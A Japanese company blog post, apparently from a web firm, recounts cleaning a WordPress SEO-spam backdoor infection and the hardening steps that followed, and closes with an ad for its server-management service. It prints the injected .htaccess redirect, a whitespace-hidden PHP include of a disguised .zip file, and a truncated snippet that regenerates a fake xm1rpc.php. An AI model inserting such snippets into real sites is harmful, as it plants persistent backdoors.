ウィルス・マルウエア
問題 → 仮説 → 実施 → 検証

今回の問題(11月2016年)以前(6月2016年)に、マルウエアスが設置されてウィルスに感染したサイト1式を対策後に、サーバにアップしました。セキュリティソフトでウィルスは削除されたが、マルウエアは通常のスクリプトなので目視で削除(1,000ページ超え)。

WordPressのプラグインCrazy Boneでログイン状況をチェック、大量のアタックを発見、アクセス元のIPをプロテクト(all in one wp security)、ログインLock Downを設定、管理画面へのログインURLを変更。

 

弊社の体験した問題について、海外のサイトでは、
https://www.posizionamento-seo.com/search-engine-optimization/seo-organico/black-hat-seo/wordpress-seo-spam-backdoor/

https://www.scmagazine.com/seo-spam-injects-backdoor-code-on-wordpress-sites/article/571921/

こんな感じで、以下と同じ問題が発生して対処している。これらのウィルス(?)マルウエア(?)は、DDoS攻撃bruteforce攻撃だそうです。

これを見る限り、日本での検証例はなく、特異な症例だったのかも知れません。

 

( 顕在化した問題 )

  1. htaccessに、以下の記述が追加される。
    <IfModule mod_rewrite.c>
    RewriteEngine On
    RewriteCond %{HTTP_USER_AGENT} (google|yahoo|msn|aol|bing) [OR]
    RewriteCond %{HTTP_REFERER} (google|yahoo|msn|aol|bing)
    RewriteRule ^.*$ index.php [L]
    </IfModule>

  2. index.php(第一階層にある)に以下の記述が追記される。この改行やスペース間もそのままにしています。
    ------
    <?php                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                   error_reporting(0);ini_set(“display_errors”, 0);$localpath=getenv(“SCRIPT_NAME”);$absolutepath=getenv(“SCRIPT_FILENAME”);$root_path=substr($absolutepath,0,strpos($absolutepath,$localpath));include_once($root_path.”/d730d81e7o133a51c2bddc5c68874ce.zip”); ?>
    ----
    上記のスペースですが、エディタで開いて、右側で折り返す設定をしないと表示されないためかと思います。(私見)
  3. 第一階層に、xm1rpc.php というファイルが生成される。(似たファイル名のxmlrpc.phpというファイルはWordPressに存在している。1とlが違う。)
  4. 第一階層に、4bb0a250f62548654e50c3d29c4b6096.zip といったファイルが生成される。ファイル名は、すべて違う。
  5. プラグインのphpファイル全てに、以下のような記述が追記されます。
    -----
    <?php $localpath = getenv(“SCRIPT_NAME”); $absolutepath = getenv(“SCRIPT_FILENAME”); $root_path = substr($absolutepath, 0, strpos($absolutepath, $localpath)); $xml = $root_path . ‘/xm1rpc.php’; if (!file_exists($xml) || file_exists($xml) && (filesize($xml) < 3000) || file_exists($xml) && (time() – filemtime($xml) > 60 * 60 * 1)) { file_put_contents($xml, ___bdec(‘PD9waHAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC(まだ続きます)
    -----
  6. これらを継続して削除しても、しばらくすると生成や追記されている。

( 仮説 )

  1. 削除しても、上記記述を生成されるので、同じ記述がシステム内に存在しいてるのでは?
  2. もしくは、外部サイトにアクセスして、何かデータを取り込んでいるのでは?
  3. WordPressシステム内に、何か追記やファイルの追加がされているのでは?
  4. FTPやWPログインからアタックされ、ログインされているのでは?

 

( 実施 )

  1. WordPressでの発生だったので、wp-adminとwp-includesをまっさらな最新ファイルに置き換え。つまり、問題が想定されるのでファイル全てを削除の後、最新ファイルをアップロード。ポイントは、いったん削除の後、正規のシステムファイルをアップロードする。
  2. プラグインを全てftpで削除→新規にインストール。
  3. 問題の1.2.の中の記述を、wp-content内でgrepしました。同様に問題3.のファイル名もgrepしてみました。
  4. eval( )が何でも外部コマンドを実行するそうなので、wp-content内をgrepしてみた。
    参考にしたのは、
    https://dogmap.jp/2016/05/10/post-3258/
  5. wp-admin、wp-includesにも何か書き換えやファイルの追加が発生している事もかんがえられるので、オリジナルとの相違をチェックしました。(新規インストールしてますが安全の為と何か解決の手がかりが見つかるのでは?と考えて)
    使用したツールは、

    WinMerge
    http://www.geocities.co.jp/SiliconValley-SanJose/8165/winmerge.html
    こらです。フォルダ全体でチェックが可能でした。

  6. xm1rpc.phpファイルのパーミッションを000にする事で、これ以上ファイルが生成されないのでは?
  7. ログイン関係一式を新しく、しかも定期的にパスワード変更→チームで共有。

 

( 検証 )

  1. 上記実施3.4.は、見つからず。
  2. 実施5.は、以下のファイルの追加と書き換えがありました。
    ファイル追加:wp-includes/index.php
    ファイル書き換え:wp-includes/load.php
    対応)追加されたファイルは削除、書き換えられたファイルは、オリジナルに書き換え。これらファイル内に、<IfModule(htaccessに記載される内容) と xm1rpc(生成される不明なファイル) の記述がありました。
  3. 5.をさらに、themeにもおこないました。
    header.php
    が書き換えられていました。しかも、このファイルにはトロイの木馬ウィルス反応がありました。(PCで使用しているセキュリティソフトで)
    対応)オリジナルに書き換え。
  4. 実施6.は、パーミッションが、しばらくすると戻ってしまいました。

 

( さらに仮説 )

  1. FTPやWordPressログインから、ファイルの書き換えが実施されているのでは?
  2. 我々の未発見の問題ファイルがあり、何かのアクション(アクセスなど)でサーバ内にファイルの追加やファイル書き換えが実施されているのでは?
  3. WordPressログインは、キャッシュが残っている場合、IDとPasswordが不要でログインできてしまうので、この部分の対応も重要では?(これは、Crazy Boneでの不正と思われるアクセスログが現象しているのに問題が継続したので)
  4. uploadされている画像にもウィルスが記述されるている可能性がある。
    参考にしたサイト(他もあります)
    http://securityblog.sonydna.com/blog/security-measure/archives6/

 

( さらに実施 )

  1. FTPやWordPressログインパスワードの再設定、高度化。実際のユーザーさんには、管理方法の提案やウィルスソフトの使用とマシンスキャンなどの提案。
    こういった内容を提案しました。
  2. WordPres管理画面から、プラグインを含むファイルの追加や書き換えをできない設定にした。
    wp-config.php
    /** ファイル編集できなくする */
    define(‘DISALLOW_FILE_EDIT’, true);
    define(‘DISALLOW_FILE_MODS’, true );
    上記を追記。
  3. header.phpとfooter.phpのパーミッションを400に変更。
  4. アップロードされた画像ファイル(膨大にありました1万ファイルくらいはあったかな)の撮影情報の記述を消滅させる事で安全化できるらしいので、実行しました。
    撮影情報の削除には、ファイル型式の変更でいけるようでしたので、jpg→png(32bit)に変換して、これをさらにjpgにもどす。pngは一端jpg(高解像度)にして、そのjpg→pngに、gifも同様の作業。
    ※)このpngを32bitにしているのは、jpgの持つ写真のグラデーションを失わないため。
  5. 追加対応)wp-adminにbasic認証。
  6. ログインにLockDown以外にCaptchaを設定。

 

これで現状は、48時間(この文章を書いている時点)、怪しいファイルの生成や書き換えは発生していない。(追記:既に10日ほど問題なし)

しかし、こう書いてみると短く簡単に思われるかと思いますが、仮説→検証は、10回くらいしたような、つまり仮説→検証で、結果がでない、イコール仮説がだめ。この繰り返し。

そもそも上記の生成されるspamファイル名や内部の記述でネット検索しても、まず情報はなく、ここに至るまで、相当の時間がかかりました。(つまり、新しい事例なのか?)

「さらに仮説の3.」は、未実施。

 

( 現時点でざっくりとした感触 )

管理画面からのファイルとpluginの書き換えを禁止したら、敵さんからのアクションが停止しました。もしかしたら、Pluginを含む管理画面から編集可能なファイルにバックドアをしかける。その上で、wp-adminやwp-includesにファイルを追加したり追記して増殖を図り、そこから、外部のサイトへのアタックだったのでしょうか?(あくまで推察)

やはり、ログインIDとパスワードの管理ですね。簡単なパスワードを使い回したりするのはよくないです。仮に、定期的に変更していても、過去に使用していたパスワードですと、簡単にログインされてしまうのではとも感じました。

spamアタックでトライするログインIDが過去に設定していたIDになるケースが多かったので、どこかネットの闇市場で、IDと想定されるパスワードが出回ったのかもしれません。

BlackList設定して特定のIPからの管理画面へのアクセスを遮断すると、敵さんは、IPアドレスを毎回変更してきました。そこで、*(アスタリスク)にして、IPアドレスのレンジを広げることにしました。

つまり、192.168.100.100 (これは仮のIPで、イントラのIPですが)を、192.168.100.*  にすると、末尾のブロックの1から255までのレンジでプロテクトができます。

自分は、大丈夫、つまり、自分のPCやMacはウィルスに感染していないという過信がよくないようにも感じました。弊社のお客さんで、マシンが不調になったので、マイクロソフトにリモートでチェックをお願いしましたところ140を超えるウィルスが検出されたそうです。

その会社さん、セキュリティソフトは入れていた様ですが、こういった結果になってしまいました。

 

( セキュリティソフトに関する考え方 )

そもそも、ウィルスは、日々世界中で、開発されていて日々世界に流れ出しています。これを、セキュリティソフトの会社さんは、発見→解析→対策→配布、を継続して行っている訳です。

これは、高額なセキュリティソフトも、フリーのソフトも同じです。こう言うと、必ず言われるのが「だったら、フリーので充分じゃない」。でも、何が違うのかというとスピードなのです。

タイムラインで考えてみてください。新種のウィルスが発生した。即、その日のうちに対応(対応パッチを適応)した、というセキュリティソフトの会社と、一ヶ月後に対策対応したセキュリティ会社さん。当然、前者のスタイルでないと困ります。対策されるまでに、大量ウィルスが飛散され問題が顕在化する恐れがありますし、またウィルスによって、サイトの攻撃とかも想定されます。

なので、前者が有料で優秀なセキュリティソフトで、後者はフリーのセキュリティソフトだったりします。そこに価格の差があるのですが、両者とも、ウィルス検出率としては、90%(数字は自信がありません)とか公表したりします。ただ、これは一か月後の検出力なのです。

ウィルスやマルウエア発生、直後の検出率ではないのです。

つまり、ウィルスやマルウエアが流布した、即、対応してプロテクトされる、これが理想です。一か月後にプロテクトできても拡散している可能性が高い、ということなのです。

 

これらのトラブル経験からサイトの管理運営を最適化したサービス「DtA管理サーバ」を始めました。
 DtA管理サーバ